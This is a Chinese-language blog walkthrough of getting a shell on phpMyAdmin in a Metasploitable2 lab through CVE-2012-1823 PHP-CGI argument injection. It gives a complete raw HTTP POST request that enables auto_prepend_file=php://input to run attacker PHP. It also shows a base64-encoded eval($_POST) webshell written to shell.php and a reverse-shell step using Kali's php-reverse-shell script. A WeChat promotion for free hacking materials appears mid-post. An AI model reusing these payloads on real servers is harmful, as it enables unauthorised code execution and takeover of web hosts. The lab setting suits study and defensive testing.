首页 > 系统相关 >phpMyAdmin 未授权Getshell

phpMyAdmin 未授权Getshell

时间:2024-02-01 17:35:14浏览次数:28  
标签:phpMyAdmin Getshell url auto prepend 授权 网安 input php

前言

做渗透测试的时候偶然发现,phpmyadmin少见的打法,以下就用靶场进行演示了。

0x01漏洞发现

环境搭建使用metasploitable2,可在网上搜索下载,搭建很简单这里不多说了。

发现phpmyadmin,如果这个时候无法登陆,且也没有前台的漏洞,可以继续在这个phpmyadmin目录下做文章。

发现setup

0x02漏洞利用

进行漏洞利用

https://juejin.cn/post/7042901479388086285

POST
/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input
HTTP/1.1
​
Host: 192.168.48.143
​
Cache-Control: max-age=0
​
Upgrade-Insecure-Requests: 1
​
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
​
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
​
Accept-Encoding: gzip, deflate
​
Accept-Language: zh-CN,zh;q=0.9
​
Cookie: phpMyAdmin=bdbb427ed9c5e8616fe90261adcfb7229d6ca189;
pma_lang=en-utf-8
​
Connection: close
​
Content-Type: application/x-www-form-urlencoded
​
Content-Length: 36
​
\<?php
​
passthru(\'id\');
​
die();
​
?\>

这里利用的是CVE-2012-1823

?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input

解码后

?-d allow_url_include=on -d auto_prepend_file=php://input

开启allow_url_include和auto_prepend_file

其中allow_url_include可以远程文件包含,auto_prepend_file加载php://input

其中php://input 可以读取http entitybody中指定长度的值,由Content-Length指定长度

【----帮助网安学习,以下所有学习资料免费领!加vx:dctintin,备注 “博客园” 获取!】

 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)

写一句话木马getshell

echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >shell.php

0x03反弹shell

利用kali现成的

cp /usr/share/webshells/php/php-reverse-shell.php ./1.php

修改这个ip

修改ip

反弹shell成功,且无文件生成。

更多网安技能的在线实操练习,请点击这里>>

  

标签:phpMyAdmin,Getshell,url,auto,prepend,授权,网安,input,php
From: https://www.cnblogs.com/hetianlab/p/18001701

相关文章

  • Redis未授权访问漏洞
    Redis简介redis是完全免费开源,一个灵活的高性能key-value数据结构存储,可以用来作为数据库、缓存和消息队列。Redis应用场景主要有两个应用场景:存储、缓存需要的场景需要高度读/写的场景使用redis快速读/写Redis结构redis主要由两个程序组成:redis客户端:redis-cliredis......
  • 第十六天: 利用 sudo 实现授权、PAM、时间同步
    一、sudo组成sudo即superuserdo,允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt,reboot,su等等。这样不仅减少了root用户的登录和管理时间,同样也提高了安全性sudo特性:sudo能够授权指定用户在指定主机上运行某些命令。如果未授权用户尝试使用sudo,会提......
  • windows下的redis未授权访问修复方法
    在windows服务中查看redis服务的启动参数,先停止此服务修改redis.windows.conf这个文件1.为Redis添加密码验证(重启redis才能生效)添加或修改以下行 requirepassmypassword其中yourpassword是你设置的强密码。 2.禁止外网访问Redis(重启redis才能生效)  修改redi......
  • 查询SQL SERVER 软件版本信息、授权许可等
    SQLSERVER软件授权许可查询概述在使用SQLServer数据库管理系统时,了解软件授权许可是非常重要的。SQLServer提供了多种许可方式,以满足不同用户的需求。本文将介绍SQLServer软件授权许可的查询方法,并提供相应的代码示例。许可方式SQLServer提供了多种许可方式,包括:企业......
  • 126邮箱授权码在哪里看
    了解126邮箱授权码的重要性在使用126邮箱时,用户常常需要授权码来进行各种操作。授权码是确保邮箱安全的一种重要方式,它可以保护用户的隐私信息不被恶意窃取。在使用126邮箱的过程中,了解授权码的作用和获取方式至关重要。126邮箱授权码的功能授权码是一种类似密码的机制,用于验证用户......
  • redis未授权
    redis未授权搭建环境ubuntu安装并启动redis服务wgethttp://download.redis.io/releases/redis-3.2.11.tar.gz#下载压缩包tarxzfredis-3.2.11.tar.gz#解压cdredis-3.2.11#进入目录make#编译执行cdsrccpredis-server/usr/bin/cpredis-cli/usr/bin/#把上面两......
  • Blazor SSR/WASM IDS/OIDC 单点登录授权实例4 - 部署服务端/独立WASM端授权
    目录:OpenID与OAuth2基础知识BlazorwasmGoogle登录BlazorwasmGitee码云登录BlazorSSR/WASMIDS/OIDC单点登录授权实例1-建立和配置IDS身份验证服务BlazorSSR/WASMIDS/OIDC单点登录授权实例2-登录信息组件wasmBlazorSSR/WASMIDS/OIDC单点登录授权实例3-服......
  • Blazor SSR/WASM IDS/OIDC 单点登录授权实例5 - Winform 端授权
    目录:OpenID与OAuth2基础知识BlazorwasmGoogle登录BlazorwasmGitee码云登录BlazorSSR/WASMIDS/OIDC单点登录授权实例1-建立和配置IDS身份验证服务BlazorSSR/WASMIDS/OIDC单点登录授权实例2-登录信息组件wasmBlazorSSR/WASMIDS/OIDC单点登录授权实例3-服......
  • Microsoft 365:如何在Azure AD中注册Application并授权相关Graph API
    51CTOBlog地址:https://blog.51cto.com/u_13969817在使用Powershell连接GraphAPI之前,首先管理员要在AzureAD中新建Application,并授权APIPermission和Credentials,本文将给大家做细节介绍:·      在AzureAD中注册Application·      授权GraphAPIPermission· ......
  • sudo提权,ansible批量给所有主机创建系统账户,授权
    sudo(superuseroranotherdo)让普通用户可以以超级管理员或其他人的身份执行命令。sudo基本流程如下:1.管理员需要先授权(修改/etc/sudoers文件)2.普通用户以sudo的形式执行命令3.可以通过sudo-l查看授权情况修改/etc/sudoers的方法如下:1.visudo(带语法检查,默认没有颜色提示)2......